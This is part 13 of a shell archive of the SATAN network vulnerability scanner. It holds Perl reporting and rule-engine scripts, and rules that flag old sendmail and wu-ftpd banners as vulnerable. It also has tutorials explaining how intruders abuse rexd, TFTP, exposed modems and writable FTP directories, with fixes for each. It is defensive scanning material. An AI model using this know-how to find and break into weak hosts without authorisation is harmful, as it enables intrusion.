X<a href="satan_results_trusting.pl,$_TRUSTED,severity_type,">problem type</a> |
X<a href="satan_results_trusting.pl,$_TRUSTED,trustee_type,">trust type</a>
X</H4>
XEOF
X
X@_hosts = split(/\s+/, $total_trustee_names{$_trusted});

Xdo "$html_root/reporting/sort_hosts.pl";
Xprint CLIENT $@ if $@;

X
Xprint CLIENT <<EOF;
X<hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> |
X<a href=analysis.pl> Back to SATAN Reporting and Analysis </a>
X</BODY>
X</HTML>
XEOF
END_OF_FILE

if test 1237 -ne `wc -c <'satan-1.1.1/html/reporting/satan_results_trusting.pl'`; then
echo shar: \"'satan-1.1.1/html/reporting/satan_results_trusting.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/reporting/satan_results_trusting.pl'
fi
if test -f 'satan-1.1.1/html/reporting/satan_severity_hosts.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/reporting/satan_severity_hosts.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/reporting/satan_severity_hosts.pl'\" $1267 characters$
sed "s/^X//" >'satan-1.1.1/html/reporting/satan_severity_hosts.pl' <<'END_OF_FILE'
X#
X# Show all hosts with a specific vulnerability.
X#
X($_SEVERITY, $_sort_order) = split(/,/, $html_script_args);
X($_severity = $_SEVERITY) =~ tr /?!/ \//;
X($_tutorial = $_severity) =~ tr / /_/;
X
Xprint CLIENT <<EOF;
X<HTML>
X<HEAD>
X<title> Host Table - $_severity </title>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> Host Table - $_severity </H1>

X<hr>
X
X<h2>

XTutorial:
X<a href="$HTML_ROOT/tutorials/vulnerability/$_tutorial.html>$_severity</a>.
X</h2>
X
X<h3>
X$severity_type_count{$_severity} Host(s).
XNumber of vulnerabilities in parentheses.
X</h3>
X
X<H4> Sort hosts by:
X<a href="satan_severity_hosts.pl,$_SEVERITY,name,">name</a> |
X<a href="satan_severity_hosts.pl,$_SEVERITY,domain,">domain</a> |
X<a href="satan_severity_hosts.pl,$_SEVERITY,type,">system type</a> |
X<a href="satan_severity_hosts.pl,$_SEVERITY,subnet,">subnet</a> |
X<a href="satan_severity_hosts.pl,$_SEVERITY,severity,">problem count</a>
X</H4>
XEOF
X
X@_hosts = keys %{$severity_type_host_info{$_severity}};

Xdo "$html_root/reporting/sort_hosts.pl";
Xprint CLIENT $@ if $@;

X
Xprint CLIENT <<EOF;
X<hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> |
X<a href=analysis.pl> Back to SATAN Reporting and Analysis </a>
X</BODY>
X</HTML>
XEOF
END_OF_FILE

if test 1267 -ne `wc -c <'satan-1.1.1/html/reporting/satan_severity_hosts.pl'`; then
echo shar: \"'satan-1.1.1/html/reporting/satan_severity_hosts.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/reporting/satan_severity_hosts.pl'
fi
if test -f 'satan-1.1.1/html/satan.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/satan.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/satan.pl'\" $1652 characters$
sed "s/^X//" >'satan-1.1.1/html/satan.pl' <<'END_OF_FILE'
Xprint <<EOF
X<HTML>
X<HEAD>
X<title>SATAN</title>
X<LINK REV="made" HREF="mailto:satan\@fish.com">

X</HEAD>
X<BODY>
X

X<H1>
X<a href="images/satan-full.gif">
X<IMG SRC="images/satan.gif"></a> SATAN Control Panel</H1>
X
X<H2>(Security Administrator Tool for Analyzing Networks)</H2>
X<HR>
X<UL>
X<dt><IMG SRC="dots/blackdot.gif" ALT="*">
X <A HREF="$HTML_SERVER/data/satan_data_form.pl"><strong> SATAN Data Management</strong></A>
X<p>
X<dt><IMG SRC="dots/blackdot.gif" ALT="*">
X <A HREF="$HTML_SERVER/running/satan_run_form.pl"><STRONG> SATAN Target selection</STRONG></A>
X<p>
X<dt><IMG SRC="dots/blackdot.gif" ALT="*">
X <A HREF="$HTML_SERVER/reporting/analysis.pl"><STRONG> SATAN Reporting & Data Analysis</STRONG></A>
X<p>
X<dt><IMG SRC="dots/blackdot.gif" ALT="*">
X <A HREF="$HTML_SERVER/admin/satan_cf_form.pl"><strong> SATAN Configuration Management</strong></A>
X<p>
X<dt><IMG SRC="dots/blackdot.gif" ALT="*">
X <A HREF="satan_documentation.html"><strong> SATAN Documentation</strong></A>
X<p>
X<dt><IMG SRC="dots/blackdot.gif" ALT="*">
X <A HREF="docs/FAQ.html#trouble"><strong> SATAN Troubleshooting</strong></A>
X</UL>
X<HR>
X<UL>
X<p>
X<dt><IMG SRC="dots/reddot.gif" ALT="*">
X <A HREF=ftp://ftp.win.tue.nl/pub/security/index.html><strong> Getting the Latest version of SATAN</strong></A>
X<dt><IMG SRC="dots/pinkdot.gif" ALT="*">
X <A HREF=name.html><strong> Couldn't you call it something other than "SATAN"?</strong></A>
X<dt><IMG SRC="dots/blackdot.gif" ALT="*">
X <A HREF=docs/artwork.html><strong> 'Bout the SATAN image</strong></A>
X<dt><IMG SRC="dots/purpledot.gif" ALT="*">
X <A HREF=docs/authors.html><strong> 'Bout the authors</strong></A>
X<p>
X</UL>

X</BODY>
X</HTML>
XEOF
END_OF_FILE

if test 1652 -ne `wc -c <'satan-1.1.1/html/satan.pl'`; then
echo shar: \"'satan-1.1.1/html/satan.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/satan.pl'
fi
if test -f 'satan-1.1.1/html/tutorials/vulnerability/REXD_access.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/tutorials/vulnerability/REXD_access.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/tutorials/vulnerability/REXD_access.html'\" $1600 characters$
sed "s/^X//" >'satan-1.1.1/html/tutorials/vulnerability/REXD_access.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<TITLE>Tutorial - REXD access</TITLE>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>
X

X<H1><IMG SRC="../../images/satan.gif">REXD access</H1>

X
X<HR>
X
X<H3>Summary</H3>
X

XREXD remote access from arbitrary hosts.

X
X<H3>Impact</H3>
X

XA remote intruder can execute commands as any user.

X
X<H3>Background</H3>
X

XThe <em>rexd</em> service and the <em>on</em> client program
Ximplement remote command execution via the network. To the extent that
Xit is possible, the complete client environment, including working
Xdirectory and environment variables, is made available on the remote
Xsystem.

X
X<H3>The problem</H3>
X

XA request for remote command execution contains, among others, the
Xcommand to be executed, and a user and group id. By default, the rexd
Xserver believes everything that the client sends it. An intruder can
Xexploit the service to execute commands as any user (except perhaps
X<em>root</em>). The typical rexd server has no protection against
Xabuse: most implementations have no provision for access control, nor
Xdo they require that the client uses a privileged network port.

X
X<H3>Fix</H3>
X
X<ul>
X

X<li>Disable the rexd service. Usually this is accomplished by editing
Xthe <em>inetd.conf</em> file, and by sending a HUP signal to the <em>
Xinetd</em> process.
X
X<li>Some rexd implementations can be configured to use a more secure
Xprotocol. Consult your manual pages for details.

X
X</ul>
X
X<H3>Other tips</H3>
X
X<ul>
X
X<li>See the

X<a href="../../docs/admin_guide_to_cracking.html#rexd">Admin

XGuide to Cracking</a> for an example of why this is a problem.
X
X</ul>

X</BODY>
X</HTML>
END_OF_FILE

if test 1600 -ne `wc -c <'satan-1.1.1/html/tutorials/vulnerability/REXD_access.html'`; then
echo shar: \"'satan-1.1.1/html/tutorials/vulnerability/REXD_access.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/tutorials/vulnerability/REXD_access.html'
fi
if test -f 'satan-1.1.1/html/tutorials/vulnerability/TFTP_file_access.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/tutorials/vulnerability/TFTP_file_access.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/tutorials/vulnerability/TFTP_file_access.html'\" $1215 characters$
sed "s/^X//" >'satan-1.1.1/html/tutorials/vulnerability/TFTP_file_access.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<TITLE>Tutorial - TFTP file access</TITLE>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>
X

X<H1><IMG SRC="../../images/satan.gif">TFTP file access</H1>

X
X<HR>
X
X<H3>Summary</H3>
X

XFile access via the TFTP service.

X
X<H3>Impact</H3>
X

XUnauthorized remote access to system or user files.
X
X<H3>Background</H3>
X
XThe TFTP (trivial file transfer protocol) service provides remote
Xaccess to files, without asking for a password. It is typically used
Xfor the initialization of diskless computers, of X terminals, or of
Xother dedicated hardware.

X
X<H3>The problem</H3>
X

XWhen the TFTP daemon does not limit access to specific files or hosts,
Xa remote intruder can use the service to obtain copies of the password
Xfile or of other system or user files, or to remotely overwrite files.

X
X<H3>Fix</H3>
X
X<ul>
X

X<li>Restrict TFTP access to only limited subtree of the file system.
XConsult your tftpd manual pages for details.
X
X<li>When no access restriction is possible, restrict TFTP access by
Xusing a tcp wrapper.
X
X</ul>
X

X<H3>Other tips</H3>
X
X<ul>
X
X<li>See the

X<a href="../../docs/admin_guide_to_cracking.html#tftp">Admin

XGuide to Cracking</a> for an example of why this is a problem.
X
X</ul>

X</BODY>
X</HTML>
END_OF_FILE

if test 1215 -ne `wc -c <'satan-1.1.1/html/tutorials/vulnerability/TFTP_file_access.html'`; then
echo shar: \"'satan-1.1.1/html/tutorials/vulnerability/TFTP_file_access.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/tutorials/vulnerability/TFTP_file_access.html'
fi
if test -f 'satan-1.1.1/html/tutorials/vulnerability/unrestricted_modem.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/tutorials/vulnerability/unrestricted_modem.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/tutorials/vulnerability/unrestricted_modem.html'\" $1092 characters$
sed "s/^X//" >'satan-1.1.1/html/tutorials/vulnerability/unrestricted_modem.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<TITLE>Tutorial - Unrestricted Modem on the Internet</TITLE>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>
X

X<H1><IMG SRC="../../images/satan.gif"> Unrestricted Modem on the Internet</H1>

X
X<HR>
X
X<H3>Summary</H3>
X

XA live and potentially unrestricted modem has been detected.

X
X<H3>Impact</H3>
X

XA remote intruder can anonymously dial anywhere that the
Xphone can call.

X
X<H3>Background</H3>
X

XIn the past, dialout modems were often placed unprotected on one of a
XUN*X host's TCP ports to facilitate their use. With the advent of
Xspecial purpose hardware with built-in protection facilities, as well
Xas extra authentication methods such as S/Key and digital tokens,
Xthere is little reason to do this.

X
X<H3>The problem</H3>
X

XAnyone can use the modem to dial anywhere, enabling them to attack
Xrandom targets and incurring you a potentially large phone bill.

X
X<H3>Fix</H3>
X

XDisallow unprotected Internet access of the modem by placing it behind a
Xfirewall or putting password or other extra authentication methods on
Xit (such as S/Key or digital tokens.)
X

X</BODY>
X</HTML>
END_OF_FILE

if test 1092 -ne `wc -c <'satan-1.1.1/html/tutorials/vulnerability/unrestricted_modem.html'`; then
echo shar: \"'satan-1.1.1/html/tutorials/vulnerability/unrestricted_modem.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/tutorials/vulnerability/unrestricted_modem.html'
fi
if test -f 'satan-1.1.1/html/tutorials/vulnerability/writable_FTP_home_directory.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/tutorials/vulnerability/writable_FTP_home_directory.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/tutorials/vulnerability/writable_FTP_home_directory.html'\" $1448 characters$
sed "s/^X//" >'satan-1.1.1/html/tutorials/vulnerability/writable_FTP_home_directory.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<TITLE>Tutorial - writable FTP home directory</TITLE>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>
X

X<H1><IMG SRC="../../images/satan.gif">Writable FTP home directory</H1>

X
X<HR>
X
X<H3>Summary</H3>
X

XFTP home directory is writable for anonymous users.

X
X<H3>Impact</H3>
X

XRemote command execution, remote file substitution.

X
X<H3>The problem</H3>
X

XWhen the FTP home directory of a UNIX host is writable, a remote
Xintruder can upload a <em>.rhosts</em> or <em>.forward</em> file to
Xgain access to the system, or may be able to replace files.
X
X<p>
X
XWhen a PC (DOS or MAC) permits anonymous users write access to its file
Xsystem, a remote intruder may be able replace arbitrary programs or
Xconfiguration files, or corrupt the file system by filling it up.
X
X<H3>Fix (UNIX)</H3>
X
X<ul>
X
X<li>Make sure that the FTP home directory, and all system
Xfiles and directories below it, are owned by <em>root</em>.
X
X<li>Make
Xsure that they are not writable by anonymous users. As a rule, no file
Xor directory should be owned by the FTP account.
X
X</ul>
X
X<H3>Other tips (UNIX)</H3>
X
X<ul>
X
X<li>Change the login shell of the ftp account to <tt>/bin/false</tt>.

X
X<li>See the

X<a href="../../docs/admin_guide_to_cracking.html#writable-ftp">
XAdmin Guide to Cracking</a> for an example of why this is a problem.
X
X<li><a href="ftp://ftp.cert.org/pub/tech_tips/anonymous_ftp">CERT/CC
XAnomymous FTP configuration guidelines</a>.
X
X</ul>

X</BODY>
X</HTML>
END_OF_FILE

if test 1448 -ne `wc -c <'satan-1.1.1/html/tutorials/vulnerability/writable_FTP_home_directory.html'`; then
echo shar: \"'satan-1.1.1/html/tutorials/vulnerability/writable_FTP_home_directory.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/tutorials/vulnerability/writable_FTP_home_directory.html'
fi
if test -f 'satan-1.1.1/perl/drop_fact.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/perl/drop_fact.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/perl/drop_fact.pl'\" $1492 characters$
sed "s/^X//" >'satan-1.1.1/perl/drop_fact.pl' <<'END_OF_FILE'
X#
X# Usage: $code = &drop_fact()
X#
X# Applies the rules in $drop_fact_files to the global $target..$text
X# variables. The result value is nonzero if the record should be ignored.
X#
X# Standalone usage: perl drop_fact.pl [satan_record_files...]
X#
X
X$drop_fact_files = "rules/drop";
X
Xsub build_drop_fact{
X local($files) = @_;
X local($code);
X
X $code = "sub drop_fact {\n";

X
X foreach $file (split(/\s+/, $files)) {
X open(RULES, $file) || die "cannot open $file: $!";
X while (<RULES>) {
X chop;
X while (/\\$/) {
X chop;
X $_ .= <RULES>;
X chop;
X }
X s/#.*$//;
X next if /^\s*$/;
X s/@/\\@/g;

X $code .= "\tif ($_) {\n\t\treturn 1;\n\t}\n";
X }
X close(RULES);
X }
X $code .= "\treturn 0;\n}\n";
X return $code;
X}
X
X#

X# Some scaffolding for stand-alone operation
X#
Xif ($running_under_satan) {

X eval &build_drop_fact($drop_fact_files);
X die "error in $drop_fact_files: $@" if $@;

X} else {
X $running_under_satan = -1;
X

X require 'perl/misc.pl';
X
X #

X # Build satan rules and include them into the running code.
X #

X $code = &build_drop_fact($drop_fact_files);
X print "Code generated from $drop_fact_files file:\n\n";

X print $code;
X eval $code;

X die "error in $drop_fact_files: $@" if $@;
X
X #

X # Apply rules.
X #
X print "\nApplying rules to all SATAN records...\n";
X while (<>) {
X chop;
X if (&satan_split($_)) {

X warn "Ill-formed fact: $_\n";
X } elsif (&drop_fact()) {
X print "Dropped: $_\n";

X }
X }
X}
X
X1;
END_OF_FILE

if test 1492 -ne `wc -c <'satan-1.1.1/perl/drop_fact.pl'`; then
echo shar: \"'satan-1.1.1/perl/drop_fact.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/perl/drop_fact.pl'
fi
if test -f 'satan-1.1.1/perl/get_host.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/perl/get_host.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/perl/get_host.pl'\" $1696 characters$
sed "s/^X//" >'satan-1.1.1/perl/get_host.pl' <<'END_OF_FILE'
Xrequire 'perl/socket.pl';
X
X# Lookup the FQDN for a host name or address with cacheing.
X#
Xsub get_host_name {
X local($host) = @_;
X local($aliases, $type, $len, @ip, $a,$b,$c,$d);
X
X # do cache lookup first
X if (exists($host_name_cache{$host})) {
X return($host_name_cache{$host});
X }
X
X # if host is ip address

X if ($host =~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/) {

X ($a,$b,$c,$d) = split(/\./, $host);
X @ip = ($a,$b,$c,$d);
X ($host) = gethostbyaddr(pack("C4", @ip), &AF_INET);
X }
X # if host is name, not ip address
X else {
X ($host, $aliases, $type, $len, @ip) = gethostbyname($host);
X ($a,$b,$c,$d) = unpack('C4',$ip[0]);
X }
X
X # success:
X if ($host && @ip) {
X $host =~ tr /A-Z/a-z/;
X return $host_name_cache{$host} = $host;
X }
X # failure:
X else {
X return $host_name_cache{$host} = "";
X }
X }
X
X#
X# Look up host address wich cacheing
X#
Xsub get_host_addr {
X local($host) = @_;
X local($aliases, $type, $len, @ip, $a,$b,$c,$d);
X
X # do cache lookup first
X if (exists($host_addr_cache{$host})) {
X return($host_addr_cache{$host});
X }
X
X # if host is name, not ip address

X if ($host =~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/) {

X return $host;
X }
X else {
X ($host, $aliases, $type, $len, @ip) = gethostbyname($host);
X ($a,$b,$c,$d) = unpack('C4',$ip[0]);
X }
X
X # success; want IP address
X if (@ip) {
X return "$a.$b.$c.$d";
X }
X # failure:
X else {
X return $host_addr_cache{$host} = "";
X }
X }
X
X#
X# Some scaffolding code for stand-alone testing.
X#
Xif ($running_under_satan == 0) {

X $running_under_satan = -1;
X

X warn "get_host.pl running in test mode";
X
X $host = &get_host_name($ARGV[0]); print "get_host_name: $host\n";
X $host = &get_host_addr($ARGV[0]); print "get_host_addr: $host\n";
X}
X
X1;
END_OF_FILE
if test 1696 -ne `wc -c <'satan-1.1.1/perl/get_host.pl'`; then
echo shar: \"'satan-1.1.1/perl/get_host.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/perl/get_host.pl'
fi
if test -f 'satan-1.1.1/perl/infer_facts.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/perl/infer_facts.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/perl/infer_facts.pl'\" $1647 characters$
sed "s/^X//" >'satan-1.1.1/perl/infer_facts.pl' <<'END_OF_FILE'
X#
X# Usage: &infer_facts();
X#
X# Apply the rules in $infer_fact_files to the global $target..$text variables
X# (and to any other globals that happen to be available) and generate new
X# facts.
X#
X# Standalone usage: perl infer_fact.pl [satan_record_files...]
X#
X
X$infer_fact_files = "rules/facts";
X
Xsub build_infer_facts {
X local($files) = @_;
X local($code, $cond, $fact);
X
X $code = "sub infer_facts {\n";

X
X foreach $file (split(/\s+/, $files)) {
X open(RULES, $file) || die "cannot open $file: $!";
X while (<RULES>) {
X chop;
X while (/\\$/) {
X chop;
X $_ .= <RULES>;
X chop;
X }
X s/#.*$//;

X s/\s+$//;
X next if /^$/;

X s/@/\\@/g;
X ($cond, $fact) = split(/\t+/, $_, 2);
X $code .= "\tif ($cond) {\n\t\t&add_fact(\"$fact\");\n\t}\n";

X }
X close(RULES);
X }
X

X $code .= "}\n";
X

X return $code;
X}
X
X#

X# Some scaffolding for stand-alone operation
X#
Xif ($running_under_satan) {

X eval &build_infer_facts($infer_fact_files);
X die "error in $infer_fact_files: $@" if $@;

X} else {
X $running_under_satan = -1;
X

X require 'perl/misc.pl';
X
X eval "sub add_fact { local(\$fact) = \@_; print \"Add-fact: \$fact\n\"; }";
X die "error in $infer_fact_files: $@" if $@;
X
X #

X # Build satan rules and include them into the running code.
X #

X $code = &build_infer_facts($infer_fact_files);
X print "Code generated from $infer_fact_files:\n\n";

X print $code;
X eval $code;

X
X #

X # Apply rules.
X #
X print "\nApplying rules to all SATAN records...\n";
X while (<>) {
X chop;
X if (&satan_split($_)) {

X warn "Ill-formed fact: $_\n";
X } else {
X &infer_facts();

X }
X }
X}
X
X1;
END_OF_FILE

if test 1647 -ne `wc -c <'satan-1.1.1/perl/infer_facts.pl'`; then
echo shar: \"'satan-1.1.1/perl/infer_facts.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/perl/infer_facts.pl'
fi
if test -f 'satan-1.1.1/perl/misc.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/perl/misc.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/perl/misc.pl'\" $1745 characters$
sed "s/^X//" >'satan-1.1.1/perl/misc.pl' <<'END_OF_FILE'
X#
X# miscellaneous perl functions that don't belong anywhere else
X#
X
X#
X# Symbolic offsets for SATAN record fields.
X#
X
X$TARGET_FIELD = 0;
X$SERVICE_FIELD = 1;
X$STATUS_FIELD = 2;
X$SEVERITY_FIELD = 3;
X$TRUSTEE_FIELD = 4;
X$TRUSTED_FIELD = 5;
X$SERVICE_OUTPUT_FIELD = 6;
X$TEXT_FIELD = 7;
X$SATAN_FIELDS = 8;
X
X# strip leading directory and optional suffix information.
Xsub basename {
X local($path, $suffix) = @_;
X
X $path =~ s:.*/::;
X if ($suffix) {
X $path =~ s/$suffix$//;
X }
X return $path;
X}
X
X# print to string
X
Xsub satan_string{
X
X return "$target|$service|$status|$severity|$trustee|$trusted|$service_output|$text";
X}
X
X# print the output for the brain/optimizer
Xsub satan_print {
X
X print "$target|$service|$status|$severity|$trustee|$trusted|$service_output|$text\n";
X
X}
X
X# format the output for the brain/optimizer
Xsub satan_text {
X
X return "$target|$service|$status|$severity|$trustee|$trusted|$service_output|$text";
X
X}
X
X# breakup record into its constituent fields
Xsub satan_split {
X local ($line) = @_;
X
X return ((($target,$service,$status,$severity,$trustee,$trusted,$service_output,$text) = split(/\|/, $line)) != $SATAN_FIELDS);
X}
X
X# count the number of elements in an associative array.
Xsub sizeof {
X local(*which) = @_;
X local(@keywords);
X
X @keywords = keys %which;
X return($#keywords + 1);
X}
X
X#
X# ensure that all paths in paths.pl file actually exist and are executable
Xsub check_paths {
Xlocal($caps, $command, $path, $null);
X
Xdie "Can't open paths.pl\n" unless open(PATHS, "paths.pl");
X
Xwhile (<PATHS>) {
X ($caps, $command) = split(/=/, $_);
X ($null, $path, $null) = split(/\"/, $command);
X die "$path is *not* executable - necessary for SATAN to run\n"
X unless -x $path;
X }
X
Xclose(PATHS);
X}
X
X1;
END_OF_FILE
if test 1745 -ne `wc -c <'satan-1.1.1/perl/misc.pl'`; then
echo shar: \"'satan-1.1.1/perl/misc.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/perl/misc.pl'
fi
if test -f 'satan-1.1.1/perllib/ctime.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/perllib/ctime.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/perllib/ctime.pl'\" $1707 characters$
sed "s/^X//" >'satan-1.1.1/perllib/ctime.pl' <<'END_OF_FILE'
X;# ctime.pl is a simple Perl emulation for the well known ctime(3C) function.
X;#
X;# Waldemar Kebsch, Federal Republic of Germany, November 1988
X;# kebsc...@nixpbe.UUCP
X;# Modified March 1990, Feb 1991 to properly handle timezones
X;# $RCSfile: ctime.pl,v $$Revision: 4.1 $$Date: 92/08/07 18:23:47 $
X;# Marion Hakanson (haka...@cse.ogi.edu)
X;# Oregon Graduate Institute of Science and Technology
X;#
X;# usage:
X;#
X;# #include <ctime.pl> # see the -P and -I option in perl.man
X;# $Date = &ctime(time);
X
XCONFIG: {
X package ctime;
X
X @DoW = ('Sun','Mon','Tue','Wed','Thu','Fri','Sat');
X @MoY = ('Jan','Feb','Mar','Apr','May','Jun',
X 'Jul','Aug','Sep','Oct','Nov','Dec');
X}
X
Xsub ctime {
X package ctime;
X
X local($time) = @_;
X local($[) = 0;
X local($sec, $min, $hour, $mday, $mon, $year, $wday, $yday, $isdst);
X
X # Determine what time zone is in effect.
X # Use GMT if TZ is defined as null, local time if TZ undefined.
X # There's no portable way to find the system default timezone.
X
X $TZ = defined($ENV{'TZ'}) ? ( $ENV{'TZ'} ? $ENV{'TZ'} : 'GMT' ) : '';
X ($sec, $min, $hour, $mday, $mon, $year, $wday, $yday, $isdst) =
X ($TZ eq 'GMT') ? gmtime($time) : localtime($time);
X
X # Hack to deal with 'PST8PDT' format of TZ
X # Note that this can't deal with all the esoteric forms, but it
X # does recognize the most common: [:]STDoff[DST[off][,rule]]
X
X if($TZ=~/^([^:\d+\-,]{3,})([+-]?\d{1,2}(:\d{1,2}){0,2})([^\d+\-,]{3,})?/){
X $TZ = $isdst ? $4 : $1;
X }
X $TZ .= ' ' unless $TZ eq '';
X
X $year += 1900;
X sprintf("%s %s %2d %2d:%02d:%02d %s%4d\n",
X $DoW[$wday], $MoY[$mon], $mday, $hour, $min, $sec, $TZ, $year);
X}
X1;
END_OF_FILE
if test 1707 -ne `wc -c <'satan-1.1.1/perllib/ctime.pl'`; then
echo shar: \"'satan-1.1.1/perllib/ctime.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/perllib/ctime.pl'
fi
if test -f 'satan-1.1.1/rules/facts' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/rules/facts'\"
else
echo shar: Extracting \"'satan-1.1.1/rules/facts'\" $1773 characters$
sed "s/^X//" >'satan-1.1.1/rules/facts' <<'END_OF_FILE'
X#
X# Rules that deduce new facts from existing data. Each rule is executed once
X# for each 'a' SATAN record. The rule format is:
X#
X# condition TABs fact
X#
X# The condition is a PERL expression that has full access to the global
X# $target..$text variables, to functions, and to everything that has been
X# found sofar. The fact is a SATAN record.

X#
X# Empty lines and text after a "#" character are ignored. Long lines may
X# be broken with backslash-newline.
X#
X#

X# version 1, Sun Mar 19 10:32:57 1995, last mod by zen
X#
X
X#
X# Assume rexd is insecure without even trying
X#
X/runs rexd/ $target|assert|a|us|ANY@$target|ANY@ANY|REXD access|rexd is vulnerable
X
X# SENDMAIL SECTION ;-)
X#
X# assume berkeley versions of sendmail < 8.6.10 are hosed:
X/sendmail 8\.6\.([0-9]+)/i && $1 < 10 \
X $target|assert|a|rs|ANY@$target|ANY@$target|Sendmail vulnerabilities|sendmail pre 8.6.10
X
X#
X# other sendmail versions
X
X# HP
X/HP Sendmail \(1\.37\.109\.11/ \
X $target|assert|a|rs|ANY@$target|ANY@$target|Sendmail vulnerabilities|sendmail pre 8.6.10
X
X#
X# Generic (or derived from) BSD; should have something >= 5.60
X/[Ss]endmail (5\.60)/ && $1 <= 5.60 \
X $target|assert|a|rs|ANY@$target|ANY@$target|Sendmail vulnerabilities|sendmail pre 5.61
X
X#
X# Sequent/DYNIX; if <= 5.65, broken...
X/[Ss]endmail (5\.65)/ && $1 <= 5.65 && /DYNIX/ \
X $target|assert|a|rs|ANY@$target|ANY@$target|Sendmail vulnerabilities|DYNIX sendmail, pre 5.65
X
X#
X# OTHER PROBLEMS
X#
X# 220 wuarchive.wustl.edu FTP server (Version wu-2.4(1) Mon
X/ftp.*$version wu-2.([0-9]+)/i && $1 < 4 \
X $target|assert|a|rs|ANY@$target|ANY@$target|FTP vulnerabilities|wuftp pre 2.4
X
X# a modem on a port? Surely you jest...
X/AT\\[nr].*OK\\[nr]/ $target|assert|a|rs|ANY@$target|ANY@$target|unrestricted modem|unrestricted modem on the Internet
END_OF_FILE
if test 1773 -ne `wc -c <'satan-1.1.1/rules/facts'`; then
echo shar: \"'satan-1.1.1/rules/facts'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/rules/facts'
fi
if test -f 'satan-1.1.1/rules/services' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/rules/services'\"
else
echo shar: Extracting \"'satan-1.1.1/rules/services'\" \(1482 characters$
sed "s/^X//" >'satan-1.1.1/rules/services' <<'END_OF_FILE'
X#
X# Rules that classify hosts by service. These are applied to every 'a' SATAN
X# record. Basically, they translate the cryptic SATAN record data to something
X# that is more suitable for reports.
X#
X# Format of this file is:
X#
X# class_name
X# condition TABs service_name TABS host
X#
X# The class_name is SERVERS or CLIENTS.

X#
X# The condition is a PERL expression, with full access to the global

X# $target..$text variables.
X#
X# The service_name field specifies a name such as "anonymous FTP" or
X# "NFS (diskless)".
X#
X# The host field specifies the host that takes or provides the service.
X# When no host is specified, $target is assumed.

X#
X# Empty lines and text after a "#" character are ignored. Long lines may
X# be broken with backslash-newline.
X#
X

XSERVERS
X
X$service eq "nntp" NNTP (Usenet news)
X$service eq "ftp" && /ANONYMOUS/ Anonymous FTP
X/NIS server/ NIS
X/runs NFS| exports \S+ to / NFS
X/mounts \S+ from (\S+)/ NFS $1
X/offers domain/ DNS
X/\/root\/\S+ to \S+/ NFS (diskless)
X/offers gopher/ Gopher
X/offers http/ WWW
X/offers X-[0-9]+$/ X Windows
X$service eq "xdmcp" XDM (X login)
X/telnet on port (\d+)/ Telnet on port $1
X/<title>/i && $service ne "http" WWW (non-standard port)
X/0'QUIT'/ && $service ne "gopher" Gopher (non-standard port)
X/220.*ftp server/i && $service ne "ftp" FTP (non-standard port)
X
XCLIENTS
X
X/NIS client/ NIS
X/\/root\/\S+ to (\S+)/ NFS (diskless) $1
X/exports \S+ to $\S+$/ NFS $1
X/([^| ]+) mounts \S+ from \S+/ NFS $1
END_OF_FILE
if test 1482 -ne `wc -c <'satan-1.1.1/rules/services'`; then
echo shar: \"'satan-1.1.1/rules/services'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/rules/services'
fi
echo shar: End of archive 13 $of 15$.
cp /dev/null ark13isdone

